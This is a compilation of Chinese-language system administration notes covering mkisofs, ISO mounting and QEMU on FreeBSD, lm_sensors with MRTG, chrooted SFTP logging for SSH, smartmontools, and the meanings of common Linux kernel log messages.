　 　语　　法：mkisofs [-adDfhJlLNrRTvz][-print-size][-quiet][-A <应用程序ID>][-abstract <摘要文件>][-b <开机映像文件>][-biblio ][-c <开机文件名称>][-C <盘区编号，磁区编号>][-copyright <版权信息文件>][-hide <目录或文件名>][-hide-joliet <文件或目录名>][-log-file <记录文件>][-m <目录或文件名>][-M <开机映像文件>][-o <映像文件>][-p <数据处理人>][-P <光盘发行人>][-sysid <系统ID >][-V <光盘ID >][-volset <卷册集ID>][-volset-size <光盘总数>][-volset-seqno <卷册序号>][-x <目录>][目录或文件]

　　补充说明：mkisofs可将指定的目录与文件做成ISO 9660格式的映像文件，以供刻录光盘。

　　参　　数：
　　-a或--all mkisofs通常不处理备份文件。使用此参数可以把备份文件加到映像文件中。
　　-A<应用程序ID>或-appid<应用程序ID> 指定光盘的应用程序ID。
　　-abstract<摘要文件> 指定摘要文件的文件名。
　　-b<开机映像文件>或-eltorito-boot<开机映像文件> 指定在制作可开机光盘时所需的开机映像文件。
　　-biblio 指定ISBN文件的文件名，ISBN文件位于光盘根目录下，记录光盘的ISBN。
　　-c<开机文件名称> 制作可开机光盘时，mkisofs会将开机映像文件中的全-eltorito-catalog<开机文件名称>全部内容作成一个文件。
　　-C<盘区编号，盘区编号> 将许多节区合成一个映像文件时，必须使用此参数。
　　-copyright<版权信息文件> 指定版权信息文件的文件名。
　　-d或-omit-period 省略文件后的句号。
　　-D或-disable-deep-relocation ISO 9660最多只能处理8层的目录，超过8层的部分，RRIP会自动将它们设置成ISO 9660兼容的格式。使用-D参数可关闭此功能。
　　-f或-follow-links 忽略符号连接。
　　-h 显示帮助。
　　-hide<目录或文件名> 使指定的目录或文件在ISO 9660或Rock RidgeExtensions的系统中隐藏。
　　-hide-joliet<目录或文件名> 使指定的目录或文件在Joliet系统中隐藏。
　　-J或-joliet 使用Joliet格式的目录与文件名称。
　　-l或-full-iso9660-filenames 使用ISO 9660 32字符长度的文件名。
　　-L或-allow-leading-dots 允许文件名的第一个字符为句号。
　　-log-file<记录文件> 在执行过程中若有错误信息，预设会显示在屏幕上。
　　-m<目录或文件名>或-exclude<目录或文件名> 指定的目录或文件名将不会房入映像文件中。
　　-M<映像文件>或-prev-session<映像文件> 与指定的映像文件合并。
　　-N或-omit-version-number 省略ISO 9660文件中的版本信息。
　　-o<映像文件>或-output<映像文件> 指定映像文件的名称。
　　-p<数据处理人>或-preparer<数据处理人> 记录光盘的数据处理人。
　　-print-size 显示预估的文件系统大小。
　　-quiet 执行时不显示任何信息。
　　-r或-rational-rock 使用Rock Ridge Extensions，并开放全部文件的读取权限。
　　-R或-rock 使用Rock Ridge Extensions。
　　-sysid<系统ID> 指定光盘的系统ID。
　　-T或-translation-table 建立文件名的转换表，适用于不支持Rock Ridge Extensions的系统上。
　　-v或-verbose 执行时显示详细的信息。
　　-V<光盘ID

从网上复制来的，太多了有点烦哈，呵呵，其实就一句顶用 mkisofs -o ABC.iso /media/cdrom
其中／media/cdrom就是我的挂载上去的光盘文件，当然也可以是文件系统里的一个文件或一个目录，如sources目录，而ABC.iso就是我想制作的iso光盘文件，文件名可以自己取！

FreeBSD如何mount一个iso文件

# mdconfig -a -t vnode -f abc.iso -u 1

# mount_cd9660 /dev/md1 /cdrom

如果想直接用-o loop , 但内核不支持的话，要在 kernel config 加入

pseudo-device vn #Vnode driver (turns a file into a device)

然后重新编译内核，就可以用：

# mount -o loop xxx.iso /mnt

FreeBSD下安装配置虚拟机qemu

大家在windows 下都用什么虚拟机？可能大多数都是用VMware 吧，那在BSD下呢？在我还用4.10的时候我也是用VM ware，但是VMware是要授权文件的，不过这个文件是可以下载到的。但是现在，在BSD下，有了更好的选择，那就是qemu，一个开源的虚拟机，小巧而快速，好了不多说，我现在 是在BSD下打算虚拟出一个win来，并且让win能上网

1 首先，用ports安装

#cd /usr/ports/emulators/qemu

#make WITH_KQEMU=yes install clean

#这里有个选项，with_kqemu，当初我就是没装个，导致出错，用了这个选项后 会在BSD启动时加入 kqemu.ko

然后就是几分钟的时间，很快的就可以装好qemu了（呵呵，比VM 时间短）

2 接下来就是使用qemu了

首先建议您重启BSD，当然，不重启也可以，用下面的步骤就可以了：

#rehash
#kldload kqemu.ko

3 要用虚拟机，当然先要为虚拟机准备一块磁盘，这里推荐使用img格式的文件做为虚拟磁盘，当然，qemu兼容vm的文件，有兴趣你也可以试试。个人感觉似乎img的磁盘文件会更快点。往下看

#mkdir /tmp/qemu #找个地方安装你的虚拟机，要注意下自己的空间哦，不要像我，直接放在了 /下，造成空间不足。强烈建议你先 df -h下

#cd /tmp/qemu

#qemu-img create windows.img 2G #这个就是创建虚拟机磁盘，后面的2G意思是创建一个2G的磁盘

4 接下就是要安装虚拟机了，我有两手准备，一是光驱，二是ISO文件。下面就开始安装

#qemu -hda windows.img -cdrom /dev/acd0 -boot d -m 512 -enable-audio -localtime

解释下上面的语法：

-hda 是指定硬盘，在本文里我们使用的是刚才创建的/tmp/qemu/windows.img
-cdrom 指定使用光驱，这个参数后面必须要跟个文件名，在上面的例子里我用的是我的物理光驱/dev/acd0 如果你要使用ISO文件，那就写上文件的路径，比如我第二安装时用的就是/mtn/e/xp.iso
-m 是指定虚拟机使用的内存大小，后面的数字即是你要指定的内存数，我的是512M
-boot 当然就是指定虚拟机启动用的设备，-boot后可以选择的参数是 a ,c ,d .其中a 是指从软盘启动，c 就是用硬盘启动，d 当然就是光驱启动了。
-enable-audio 这个意思我就不说了。
-localtime 就是说要使用你的实际主板bios上的时间。

好了，按以上的步骤做了以后，就可以顺利的进入虚拟机了，并开始安装了。

上一步可能会出错：
Xlib: connection to ":0.0" refused by server

*注意：如果你在安装QEMU没有选择 WITH_KQEMU，那么你将不能使用ISO文件来安装，这一点要注意。可在/boot/loader.conf中加入 kqemu_load="YES"。要想自己是否安装了kqemu.ko就自己看下：

#kldstat

也可能是出错：
Bad system call (core dumped)

*注意：这是因为FreeBSD上最新的版本需要kldload aio才可以，可在/boot/loader.conf中加入 aio_load="YES"

下面是引用Linux下的Qemu的使用，由天Qemu是跨平台的，所以应该通用，当然，我只是为可能出现的问题提供一个解决参考：

安装过程中，要求换盘：

在qemu中按ctrl+alt+2切换到qemu monitor模式 输入?或help可以查看可用命令及使用说明。

(在其他版本的qemu中，运行qemu加载OS后，这个shell就会自动变成qemu monitor模式)

change device filename -- change a removable media

看来它就是用来换盘的了 : change cdrom /rhel4/EL_disc2.iso

5 虚拟机装好以后就可以用了，这里要给大家说几个常用的快捷键：

ctrl+alt+F 全屏切换
ctrl+alt 鼠标在虚拟机和主机间切换

6 虚拟XP上网的问题：

其实用上面的方法安装完后，你的XP已经能上网了，当然你要用DHCP方式。你也可以在启动时加上 -user-net 这个参数。我觉得qemu可能是默认就带了这个参数了，因为我没用任何参数就可以上网。

不过要说的是，采用这种默认的参数你只能 ping 你的BSD主机，不能ping 外网的，而且你得到的IP是10.0.2.X,Gateway 也一定是10.0.2.2,所以你不要奇怪。这种上网方式主机跟虚拟机的通讯不方便，至少我的samba就不行，也没有解决掉。

qemu也提供了第二种上网方案：tun方式，这个方式其实就是在你的BSD下虚拟一张网卡tun0，这样你的BSD就是双网卡上网，这种方式最大好处就是虚拟机跟主机还有外网通讯比较方便。不过首先你的内核要支持tun设备才行。我的是5.4 release-p6针对5.0以前的应该先这样做：

#cd /dev
# sh MAKEDEV tun0

如果你跟我一样，是5。X那就先：

#mknod tun0 c 20 0
#ls /dev

接下来：

#ifconfig tun0 XXX.XXX.XXX.XXX #设定tun0的IP，一般用192.168开头的，也有人喜欢10开头的，随便啦，我的是192.168.0.1

然后进入虚拟机XP里，设定你的IP为：192.168.0.XXX，网关为 192.168.0.1(*也就是tun0）dns 就是BSD主机的dns。

这样设定之后，虚拟机还不能上网，但已经能用samba 了。[color=darkred]要想用虚拟机上网，这就要用到nat 了，设置方法完全跟NAT是一样的，我就不多说了，下面的东西就只有请你参考FreeBSD 的NAT来完成了。

用MRTG监测Linux系统CPU温度

在Linux下有个叫lm_sensors的软件可以帮助我们来监控主板，CPU的工作电压，风扇转速、温度等数据。这些数据我们通常在主板的 BIOS也可以看到。当我们可以在机器运行的时候通过lm_sensors随时来监测着CPU的温度变化，可以预防呵保护因为CPU过热而会烧掉。
1. 安装lm_sensors
现在基本上每个Linux都已经有lm_sensors包了，我们主要安装了就可以了。或者我们也可以通过源文件来自己编译。
1)在FC，RH， CENTOS下，用rpm：
[root@securitycn ~]# rpm -ivh lm_sensors-2.10.0-3.1.i386.rpm
3)编译源文件安装
我们可以通过:这里下载源文件
这里我们要注意的问题是要先安装libsysfs库，是Sysfsutils，Sysfsutils－devel软件

tar xzvf lm-sensors-xxx.tar.gz
make user
make user_install testing

下面我们就用一些简单的命令来利用lm_sensors来得到CPU的数据。我们要用root的身份来：

sensors-detect，然后它会自动搜索主板上的chipset和相应的driver,我们全部答YES就可以了

[root@securitycn ~]# sensors-detect

# sensors-detect revision 1.413 (2006/01/19 20:28:00)

This program will help you determine which I2C/SMBus modules you need to
load to use lm_sensors most effectively. You need to have i2c and
lm_sensors installed before running this program.
Also, you need to be `root', or at least have access to the /dev/i2c-*
files, for most things.
If you have patched your kernel and have some drivers built in, you can
safely answer NO if asked to load some modules. In this case, things may
seem a bit confusing, but they will still work.

It is generally safe and recommended to accept the default answers to all
questions, unless you know what you're doing.

We can start with probing for (PCI) I2C or SMBus adapters.
You do not need any special privileges for this.
Do you want to probe now? (YES/no):

全部默认YES即可。

然后我们启动lm_sensors ：

/etc/init.d/lm_sensors start
Starting lm_sensors: [ OK ]

我们可以通过lsmod来确定我们需要的driver已经加载了没有

lsmod | grep i2c
i2c_isa 9153 2 w83627hf,w83781d
i2c_i801 11341 0
i2c_dev 12613 0
i2c_ec 9025 1 sbs
i2c_core 23745 6 w83627hf,w83781d,i2c_isa,i2c_i801,i2c_dev,i2c_ec

然后我们用sensors的命令就可以了：

[root@securitycn ~]# sensors

w83627hf-isa-0290
Adapter: ISA adapter
VCore 1: +3.33 V (min = +0.00 V, max = +0.00 V) ALARM
VCore 2: +3.36 V (min = +0.00 V, max = +0.00 V) ALARM
+3.3V: +0.93 V (min = +3.14 V, max = +3.46 V) ALARM
+5V: +5.11 V (min = +4.73 V, max = +5.24 V)
+12V: +4.56 V (min = +10.82 V, max = +13.19 V) ALARM
-12V: -7.10 V (min = -13.18 V, max = -10.88 V) ALARM
-5V: -1.93 V (min = -5.25 V, max = -4.75 V) ALARM
V5SB: +5.51 V (min = +4.73 V, max = +5.24 V) ALARM
VBat: +0.02 V (min = +2.40 V, max = +3.60 V) ALARM
fan1: 0 RPM (min = 2732 RPM, div = 2) ALARM
fan2: 0 RPM (min = 0 RPM, div = 2)
fan3: 0 RPM (min = 0 RPM, div = 2)
temp1: +38癈 (high = +50癈, hyst = +45癈) sensor = thermistor
temp2: +33.5癈 (high = +80癈, hyst = +75癈) sensor = thermistor
temp3: +33.5癈 (high = +80癈, hyst = +75癈) sensor = thermistor
vid: +0.000 V (VRM Version 10.0)
alarms:
beep_enable:
Sound alarm enabled

这里我们可以看到温度还没有相对应CPU，我们主要稍微修改一下/etc/sensors.conf就可以了，不过其实都不用我们自己去动手，一般我们都可以从主板生产商那里下载到配置文件。通过lmsensors我们就可以得到主板温度，CPU电压，风扇转速这些信息。我们可以根据这些数据来监察系统的运行情况来预防系统的问题。

接下来让它和MRTG整合在一起吧
[root@securitycn ~]# cd /usr/local/mrtg/bin
[root@securitycn ~]# vi temp.sh
#内容如下
#!/bin/bash
cputemp=`/usr/bin/sensors | grep temp1 |awk '{print $2}'|cut -c 2-4` #这句是说找出有temp1那一行,印出第二个列的2-4个字
systemp =`/usr/bin/sensors | grep temp2 |awk '{print $2}'|cut -c 2-5` 不用解释了吧
echo $cputemp
echo $systemp
# the uptime
uptime | sed 's:^.* up \(.*\), [0-9][0-9]* users.*$:\1:'
# my name
uname -n
　
[root@securitycn ~]# chmod +x temp.sh 改成可执行
[root@securitycn ~]# ./temp.sh 试试看有没有问题
39
33.5
15:36:19 up 22:28, 1 user, load average: 0.04, 0.09, 0.04
securitycn

再来写下面的文件
[root@securitycn ~]# cd ../etc/
[root@securitycn ~]# vi temp.cfg

WorkDir: /data1/usr/apache/htdocs/mrtg/temp/
Target[index]: `/usr/local/mrtg/bin/temp.sh`
MaxBytes[index]:80
Options[index]: gauge, nopercent, growright
YLegend[index]: Temp (度)
ShortLegend[index]: 度
LegendO[index]: 系统温度;
LegendI[index]: CPU温度;
Title[index]: 系统温度表
PageTop[index]: <H1>主机温度表</H1>

[root@securitycn ~]# /usr/local/mrtg/bin/mrtg /usr/local/mrtg/etc/temp.cfg
执行3次就不报错了
然后加入到crontab里面
*/5 * * * * /usr/local/mrtg/bin/mrtg /usr/local/mrtg/etc/temp.cfg

PageTop[index]: <H1>主机温度表

Cannot load /usr/local/apache/libexec/libphp4.so into server: /usr/local/apache/libexec/libphp4.so: cannot restore segment prot after reloc: Permission denied

今天编译了下php+apache居然报错（环境是redhat企业版5server）：
[root@securitycn conf]# /usr/local/apache/bin/apachectl configtest
Syntax error on line 205 of /usr/local/apache/conf/httpd.conf:
Cannot load /usr/local/apache/libexec/libphp4.so into server: /usr/local/apache/libexec/libphp4.so: cannot restore segment prot after reloc: Permission denied
原来是SELinux搞的，经常遇到类似的情况，一直忽略了他，之前snmp的时候就是因为他只好禁止了，现在又遇到，越安全的越受到限制啊，解决办法
1. chcon -t texrel_shlib_t /usr/local/apache/libexec/*.so
2.禁止SELinux：更改/etc/sysconfig/selinux 文件的内容为 SELINUX=permissive或者disabled

如何制作绿色版的Firefox 2.0

之前版本的Firefox，可以用“-profile”参数来轻松搞定“绿色化”Firefox 2.0，不过这个技巧在Firefox 2.0中行不通了。要想制作绿色版的Firefox 2.0:

第一步:在Firefox安装目录下自建一个文件夹“profile”，把C:\Documents and Settings\xxx\Application Data\Mozilla\Firefox\Profiles\default的内容复制进去，然后打开C:\Documents and Settings\xxx\Application Data\Mozilla\Firefox\profiles.ini，作出修改如下:

[General]

StartWithLastProfile=1

[Profile0]

Name=默认用户

IsRelative=0

Path=X:\Program Files\Mozilla Firefox\profile

第二步:以后如果需要重装系统，只需要将profiles.ini和profile备份，拷贝回原处即可。

Linux下增量备份远程ftp站点内容

可以考虑直接使用mirror等ftp镜像软件，在Debian的包管理器中搜索ftp mirror，就能找到不少。我选择使用了lftp，一来lftp自带镜像功能、支持增量下载，二来lftp十分健壮，对大多数错误可以自动续传和重试。

可以用以下语句调用lftp镜像或更新ftp镜像：(:source lang=shell:) lftp -c 'open -e "mirror . /home/elias/Web/elias.cn_bak/" -u USERNAME,PASSWORD www.elias.cn'

其中“mirror”后面的英文句号意思是镜像整个ftp站点，也可以写成ftp站点上的远端路径，比如写/incomings/src；“/home/elias/Web/elias.cn_bak/”则是指定的本地存储路径；USERNAME是远端 ftp用户名、PASSWORD是远端ftp密码；“www.elias.cn”则是远端ftp站点的访问地址。

ssh-3.2记录sftp日志，并且chroot锁定用户目录解决方案

本站原创转载注明出处
by:vitter(vitter_at_safechina.net)
My blog: http://blog.securitycn.net
www.securitycn.net,www.vfocus.net,www.safechina.net

1、准备工作

下载ssh，http://www.ssh.com/ 下载针对Linux的非商业版本，当前最新版本为3.2.9.1，具体地址为：
SSH服务器地址 http://www.ssh.com/support/downloads/secureshellserver/non-commercial.html
http://ftp.ssh.com/pub/ssh/
[root@vitter_test src]# wget http://ftp.ssh.com/pub/ssh/ssh-3.2.9.1.tar.gz

2、安装ssh

[root@vitter_test src]# tar zxvf ssh-3.2.9.1.tar.gz
[root@vitter_test src]# cd ssh-3.2.9.1
[root@vitter_test ssh-3.2.9.1]# ./configure --prefix=/usr/local/sshd --without-x(因为我没x所以去掉)
[root@vitter_test ssh-3.2.9.1]# make
[root@vitter_test ssh-3.2.9.1]# make install

3、设置ssh记录sftp日志

修改sshd的配置文件，默认/etc/ssh2/sshd2_config,也可以启动的时候手动指定：/usr/local/sshd/sbin/sshd2 -f /etc/ssh2/sshd2_config_my。
去掉这行注释，用于记录sftp的log：

SftpSysLogFacility LOCAL7

当然
subsystem-sftp sftp-server
这行也要去掉注释，否则不启用sftp
其他的配置我们不详细介绍了，网上介绍的很多，google即可

然后修改syslog的配置文件

[root@vitter_test etc]# vi /etc/syslog.conf
加上一行：
local7.notice /var/log/sftp.log

则sftp的log会记录到/var/log/sftp.log中。

重启syslog服务

[root@vitter_test etc]# service syslog restart

启动ssh

[root@vitter_test etc]# /usr/local/sshd/sbin/sshd2 -f /etc/ssh2/sshd2_config

这时，登录sftp看看，是不是已经在/var/log/sftp.log中记录了sftp操作的详细日志了。

4、设置sftp用户chroot目录（锁定在固定目录下）

这一部是比较麻烦的，我也是经过了好些天，在openssh+patch+第三方软件和ssh之间测试了好些天才找到很好的解决方法，之前主要集中了openssh上，结果问题多多，最后才感觉用ssh简单点。

ssh配置文件支持chroot，但是记录log遇到问题，下面是解决方法。

4.1、[root@vitter_test etc]# vi /etc/ssh2/sshd2_config

找到下面几行：
## Chrooted environment

# ChRootUsers anonymous,ftp,guest
# ChRootGroups sftp,guest

ChRootUsers和ChRootGroups控制哪些用户和组将要chroot目录。

我的设置是

ChRootGroups nobody

针对组，之后在添加新用户的时候方便。

4.2、添加sftp用户：
[root@vitter_test etc]# useradd -d /ok -g nobody -s /usr/local/ssh/bin/ssh-dummy-shell ok

4.3、用下面脚本生成chroot用户目录下需要的文件

[root@vitter_test etc]# cat /root/chroot_ssh_dir.sh

#/bin/bash

if [ $# -ne 1 ]; then
echo "Usage: $0 username" 1>&2
exit 1
fi

user=$1

SSH_PATH="/usr/local/sshd"
#注释：后面的路径是你安装的ssh的目录
CHROOT_PATH=`grep -E $user: /etc/passwd|awk -F':' '{print $6}'`

mkdir -p $CHROOT_PATH/$SSH_PATH/bin/
mkdir -p $CHROOT_PATH/dev

ln $SSH_PATH/bin/sftp-server $CHROOT_PATH/$SSH_PATH/bin/sftp-server
ln $SSH_PATH/bin/sftp-server2 $CHROOT_PATH/$SSH_PATH/bin/sftp-server2
ln $SSH_PATH/bin/ssh-dummy-shell $CHROOT_PATH/$SSH_PATH/bin/ssh-dummy-shell
for a in $(ldd $SSH_PATH/bin/sftp-server | awk '{print $3}')
do
[ -e $CHROOT_PATH`dirname $a` ] || mkdir -p $CHROOT_PATH`dirname $a`
cp -f $a $CHROOT_PATH$a;
done

for a in $(ldd $SSH_PATH/bin/sftp-server2 | awk '{print $3}')
do
[ -e $CHROOT_PATH`dirname $a` ] || mkdir -p $CHROOT_PATH`dirname $a`
cp -f $a $CHROOT_PATH$a;
done

for a in $(ldd $SSH_PATH/bin/ssh-dummy-shell | awk '{print $3}')
do
[ -e $CHROOT_PATH`dirname $a` ] || mkdir -p $CHROOT_PATH`dirname $a`
cp -f $a $CHROOT_PATH$a;
done

[root@vitter_test etc]# /root/chroot_ssh_dir.sh ok
这样就把ok用户所需的文件生成到了ok的用户目录下。

4.4、修改syslog服务启动脚本：

[root@vitter_test etc]# vi /etc/init.d/syslog

在
daemon klogd $KLOGD_OPTIONS
echo
[ $RETVAL -eq 0 ] && touch /var/lock/subsys/syslog
和
return $RETVAL.
之间加上sftp：
daemon klogd $KLOGD_OPTIONS
echo
[ $RETVAL -eq 0 ] && touch /var/lock/subsys/syslog
sftp
return $RETVAL
然后在
restart() {
stop
start
}

后面加上：

sftp() {
for dir in `grep -E ':99:' /etc/passwd|grep -v '^nobody'|awk -F':' '{print $6}'`
#注释：99是nobody的gid号，这样以后添加新的nobody组用户后，只需要重启下syslog服务即可。
do
ls $dir/dev/log > /dev/null 2>&1
if [ $? -eq 0 ];then
rm -f $dir/dev/log
fi
ln /dev/log $dir/dev/log
done
}

4.5、重启syslog服务

[root@vitter_test etc]# service syslog restart

然后看下用户chroot目录下的dev下是不是新生成了个log文件，这个是记录日志的关键

至此一切ok。

5、如果以后添加新用户的话，只需要重复4.2、4.3、 4.5、即可。

注：
在nfs系统中我遇到了/dev/log 因为是nfs系统，而用户chroot目录是xfs系统文件，出现了ln硬链接失败（因为跨文件系统了）问题，只好再改下/etc/sysconfig/syslog里面的
SYSLOGD_OPTIONS="-m 0 -r"
为：SYSLOGD_OPTIONS="-m 0 -r -p /data/log"
然后syslog启动脚本改成
ln /data/log $dir/dev/log
另外就是这样改了之后可能会导致部分服务记录日志有问题，比如crond和sendmail，所以不建议修改。

openssh记录sftp详细日志，并chroot用户目录

本站原创转载注明出处
by:vitter(vitter_at_safechina.net)
My blog: http://blog.securitycn.net
www.securitycn.net,www.vfocus.net,www.safechina.net

1 安装准备
下载openssh和sftp logging patch for openssh
http://www.openssh.org/
http://sftplogging.sourceforge.net/
以openssh-4.4p1为例

1.1 解压openssh
tar zxvf openssh-4.4p1.tar.gz

1.2 log补丁
patch -p0 < openssh-4.4p1.sftplogging-v1.5.patch

1.3 编译
cd openssh-4.4p1
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam
注：--with-pam是支持pam,--prefix=/usr --sysconfdir=/etc/ssh是与原来的sshd保持一致
make

1.4 如果1.3通过，停止sshd服务
service sshd stop

1.5 卸载 openssh-server和openssh
rpm -qa|grep openssh
openssh-clients-3.6.1p2-34
openssh-server-3.6.1p2-34
openssh-3.6.1p2-34

rpm -e --nodeps openssh-server-3.6.1p2-34
rpm -e --nodeps openssh-3.6.1p2-34
只卸载openssh-server和openssh，因为我们只关心这两个服务

1.6 安装刚刚编译的openssh
make install

1.7 重建 /etc/rc.d/init.d/sshd
cp contrib/redhat/sshd.init /etc/rc.d/init.d/sshd

1.8 重建 pam.d/sshd
cat /etc/pam.d/sshd
#%PAM-1.0
auth required pam_stack.so service=system-auth
auth required pam_nologin.so
account required pam_stack.so service=system-auth
password required pam_stack.so service=system-auth
session required pam_stack.so service=system-auth

1.9 openssh支持sftp上传下载日志记录
vi /etc/ssh/sshd_config

LogSftp yes
SftpLogFacility AUTH

vi /etc/syslog.conf
auth,authpriv.* /var/log/sftp.log

service syslog restart

1.10 重启 sshd
service sshd start

2 配置sshd以支持chroot

2.1 构建chroot环境

2.1.1 使用环境变量，方便
export CHROOT_PATH=/home/vitter

2.1.2 创建基本目录
mkdir -p $CHROOT_PATH/{bin,home,usr,lib}
chown -R root.root $CHROOT_PATH
cd $CHROOT_PATH

2.1.3 创建 /bin/bash环境
cp /bin/bash $CHROOT_PATH/bin/bash
for a in $(ldd /bin/bash | awk '{print $3}')
do
[ -e $CHROOT_PATH`dirname $a` ] || mkdir -p $CHROOT_PATH`dirname $a`
cp -f $a $CHROOT_PATH$a;
done

2.1.4 创建 sftp-server 环境
export SFTP_SERVER=`grep Subsystem /etc/ssh/sshd_config | awk '{print $3}'`
echo $SFTP_SERVER
mkdir -p $CHROOT_PATH/`dirname $SFTP_SERVER`
cp $SFTP_SERVER $CHROOT_PATH$SFTP_SERVER
for a in $(ldd $SFTP_SERVER | awk '{print $3}')
do
[ -e $CHROOT_PATH`dirname $a` ] || mkdir -p $CHROOT_PATH`dirname $a`
cp -f --reply=yes $a $CHROOT_PATH$a;
done

chroot环境已经搭建完毕，只有一个bash可供使用
sftp-server，是为了相应用户的sftp登陆的

2.2 配置chroot-openssh

2.2.1 添加或指定享受此待遇的用户，这里以sftptest为例
useradd -d /home/sftptest sftptest
mv /home/sftptest $CHROOT_PATH/home/sftptest
ln -s $CHROOT_PATH/home/sftptest /home/sftptest
passwd sftptest

这里使用了软连接，为了保持chroot环境和实际环境的一致。

2.2.2 修改sshd配置
[vi /etc/ssh/sshd_config]
UsePAM yes

2.2.3 修改sshd.pam配置
[vi /etc/pam.d/sshd]
session required pam_chroot.so

2.2.4 修改chroot配置
echo sftptest $CHROOT_PATH >> /etc/security/chroot.conf

2.2.5 重新启动
service sshd restart

3 可选操作,增加安全性
chattr -R +i $CHROOT_PATH
chattr -R -i $CHROOT_PATH/home

ssh 记录sftp上传下载等日志

在ssh的配置文件里面加上这行：
SftpSysLogFacility LOCAL7
在/etc/syslog.conf加上这行：
local7.notice /var/log/sftp
重启syslog和ssh服务，之后sftplog记录到/var/log/sftp里面

sftp logging patch for OpenSSH让sftp记录上传下载日志

sftp logging patch for OpenSSH是个能让openssh的sftp能记录用户log的补丁程序。
装好后在 sshd_config 加入 LogSftp yes
log 会记录在/var/log/auth.log
如果还看不到/var/log/auth.log的话请检查/etc/syslog.conf 里auth 的设置

提前了解硬盘健康的SMART工具软件

现在的硬盘的容量和速度越来越快了，故障率也比前的东西高，总觉得现在的质量没有以前的好，数据都放在里面，要有故障造成的损失可大可小，有没有简单的方法可提前发现硬盘的状态，做好准备。有个smartmontools 软件包只用2个命令smartctl和smartd　，软件在http://smartmontools.sourceforge.net/
　　
SMART
　　SMART(SFF-8035i) 是硬盘生产商们建立的一个工业标准，这个标准就是在硬盘上保存一个跟执行情况，可靠程度，读找错误率等属性的表格。所有属性都有一个1byte(大小范围 1-253)的标准化值，还包含另一个1byte的关键阶段值，如果属性表格内某个数据接近小于或达到关键阶段值，那么你的硬盘就快跟你永别了，至少也是超过它的设计使用极限了- 该做备份和最坏的打算了。
　　
　　SFF-8035i工业标准经过ATA-3，ATA-4到了ATA-5，加入了一个错误信息文件(error log) 和一系列硬盘自测SMART命令。SMART适应与IDE和SCSI硬盘。
支持平台：
Mac OSX, Linux, FreeBSD, NetBSD, OpenBSD, Solaris, OS/2, eComStation or Windows system
在windows下可以个：smartmontools-5.36-1.win32.zip　解压出
binsmartctl.exe,smartd.exe,syslogevt.exe
doc*
3个主要文件smartctl.exe,smartd.exe,syslogevt.exe，为方便把它拷到C:
在命令提示符下：
C:>smartd.exe <--先运行smart
C:>smartd.exe
smartd: already running.
Use "smartd status|stop|reload|restart|sigusr1|sigusr2" to control daemon.
说明已经在跑
查一下硬盘是否支持SMART
C:>smartctl -i /dev/hda
smartctl version 5.36 [i686-mingw32-xp-sp2] Copyright (C) 2002-6 Bruce Allen
Home page is http://smartmontools.sourceforge.net/
=== START OF INFORMATION SECTION ===
Model Family: IBM/Hitachi Deskstar GXP-180 family
Device Model: IC35L120AVV207-0
Serial Number: VNVD30G4C9VP0T
Firmware Version: V24OA66A
User Capacity: 120,034,123,776 bytes
Device is: In smartctl database [for details use: -P show]
ATA Version is: 6
ATA Standard is: ATA/ATAPI-6 T13 1410D revision 3a
Local Time is: Thu Apr 20 11:47:15 2006
SMART support is: Available - device has SMART capability.
Enabled status cached by OS, trying SMART RETURN STATUS cmd.
SMART support is: Enabled
简单查一下硬盘健康状态
C:>smartctl -H /dev/hda
smartctl version 5.36 [i686-mingw32-xp-sp2] Copyright (C) 2002-6 Bruce Allen
Home page is http://smartmontools.sourceforge.net/
=== START OF READ SMART DATA SECTION ===
SMART overall-health self-assessment test result: PASSED
如果你的self-assessment test result是FAILING，那就是说它要完蛋了，快点做准备工作
　　查硬盘历史错误信息(error log)
　　smartctl -l error /dev/hda
　　
　　硬盘自测
　　smartctl -l selftest /dev/hda
　　
　　终止硬盘自测。
　　smartctl -X /dev/hda
其它的想了解更多的可用　C:>smartctl -h
实现的功能可能没有LINUX下多？
smartmontools在LINUX和其它的系统上，有源包和适合各系统的软件包，通常新版的LINUX，如Redhat4，Fedora3以上都有安装了，如你手痒的话可以装源包
具体的下载和安装，参考http://smartmontools.sourceforge.net/的“How to download and install smartmontools”这里不细说，LINUX下
[root@localhost ~]# vi /etc/smartd.conf
/dev/sda -H -m root@localhost.localdomain
设置文件smartd.conf，有一个“-m”的选项，它设定把信息mail给谁。
　　
SMART 只是提醒工具，但不能帮你做备份。要真正的让SMART为你服务，应该好好读写smartd & smartd.conf 的注释, 让其后台程序在一定情况下提醒你(mail)有些关键值达到了危险区域, 以上给出的几个命令是在你开始感到情况不妙的时候进行的手工测试
注：在vmware下虚拟的RedhatLinux的SMART是起不来的，因虚拟的硬盘是不支持SMART的。

linux服务器前台常出现的提示及含意

一般类的提示
eth1: Too much work at interrupt, IntrStatus=0x0001
这条提示的含意为. 某网卡的中断请求过多. 如果只是偶尔出现一次可忽略. 但这条提示如果经常出现或是集中出现,那涉及到的可能性就比较多有可能需要进行处理了. 可能性比较多,如网卡性能;服务器性能;网络攻击..等等.

一般类的提示
IPVS: incoming ICMP: failed checksum from 61.172.0.X!
服务器收到了一个校验和错误的ICMP数据包. 这类的数据包有可能是非法产生的垃圾数据.但从目前来看服务器收到这样的数据非常多.一般都忽略.
一般代理服务器在工作时会每秒钟转发几千个数据包.收到几个错误数据包不会影响正常的工作.
这是问我最多的一类提示了.

一般类的提示
kernel: NET: N messages suppressed.
服务器忽略了 N 个数据包.和上一条提示类似.服务器收到的数据包被认为是无用的垃圾数据数据. 这类数据多是由攻击类的程序产生的.
这条提示如果 N 比较小的时候可以忽略.但如果经常或是长时间出现3位数据以上的这类提示.就很有可能是服务器受到了垃圾数据类的带宽攻击了.

一般类的提示
kernel: UDP: bad checksum. From 221.200.X.X:50279 to 218.62.X.X:1155 ulen 24
kernel: UDP: short packet: 218.2.X.X:3072 3640/217 to 222.168.X.X:57596
kernel: 218.26.131.X sent an invalid ICMP type 3, code 13 error to a broadcast: 0.1.0.4 on eth0
服务器收到了一个错误的数据包.分别为 UDP校验和错误; 过短的UDP数据包; 一个错误的ICMP类型数据. 这类信息一般情况下也是非法产生的.
但一般问题不大可直接忽略.

一般类的提示
kernel: conntrack_ftp: partial 227 2205426703+13
服务器在维持一条FTP协议的连接时出错. 这样的提示一般都可以直接忽略.

网络通信严重问题!
kernel: NETDEV WATCHDOG: eth1: transmit timed out
kernel: eth1: link down
kernel: eth1: link up, 10Mbps, half-duplex, lpa 0x0000
kernel:eth2: link up, 100Mbps, full-duplex, lpa 0x41E1
setting full-duplex based on MII #24 link partner capability of 45e1
